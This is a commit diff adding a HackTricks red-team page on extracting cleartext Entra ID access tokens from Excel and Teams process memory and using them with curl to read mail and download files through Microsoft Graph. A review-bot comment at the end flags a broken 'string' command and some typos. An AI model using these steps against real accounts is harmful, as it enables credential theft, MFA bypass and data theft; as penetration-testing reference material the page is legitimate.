Commit
1 parent
eabd436
commit e15f924
Showing 3 changed files with 67 additions and 1 deletion.
65 changes: 65 additions & 0 deletions
...-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
@@ -0,0 +1,65 @@ | ||
# Az - Processes Memory Access Token | ||
|
||
{% hint style="success" %} | ||
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\ | ||
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte) | ||
|
||
<details> | ||
|
||
<summary>Support HackTricks</summary> | ||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! | ||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** | ||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. | ||
|
||
</details> | ||
{% endhint %} | ||
|
||
## **Basic Information** | ||
|
||
As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA. | ||
|
||
Steps: | ||
|
||
1. Dump the excel processes syncronized with in EntraID user with your favourite tool. | ||
2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output | ||
3. Find the tokens that interest you the most and run tools over them: | ||
|
||
{% code overflow="wrap" %} | ||
```bash | ||
# Check the identity of the token | ||
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq | ||
|
||
# Check the email (you need a token authorized in login.microsoftonline.com) | ||
curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq | ||
|
||
# Download a file from Teams | ||
## You need a token that can access graph.microsoft.com | ||
## Then, find the <site_id> inside the memory and call | ||
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq | ||
|
||
## Then, list one drive | ||
curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq | ||
|
||
## Finally, download a file from that drive: | ||
┌──(magichk㉿black-pearl)-[~] | ||
└─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>' | ||
``` | ||
{% endcode %} | ||
|
||
**Note that these kind of access tokens can be also found inside other processes.** | ||
|
||
{% hint style="success" %} | ||
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\ | ||
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte) | ||
|
||
<details> | ||
|
||
<summary>Support HackTricks</summary> | ||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! | ||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** | ||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. | ||
|
||
</details> | ||
{% endhint %} |
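Review bot: The command in step 2, `string excel.dmp | grep 'eyJ0'`, does not run as written because the binutils tool is `strings`, not `string`; please change it to `strings excel.dmp | grep 'eyJ0'`. In the same hunk, the last command of the bash block still carries a pasted terminal prompt (`┌──(magichk㉿black-pearl)-[~]` and `└─$`) that should be stripped so the block is copy-pasteable like the commands above it, and the comment `## Then, list one drive` does not describe the request under it, which fetches the metadata of a single drive (`.../drives/<drive_id>`) rather than listing anything; either reword the comment or point at the endpoint that actually lists drive contents. Step 1 also has typos: "Dump the excel processes syncronized with in EntraID user" should read "Dump the Excel processes synchronized with an Entra ID user", and the closing note "these kind of access tokens can be also found" should be "this kind of access token can also be found".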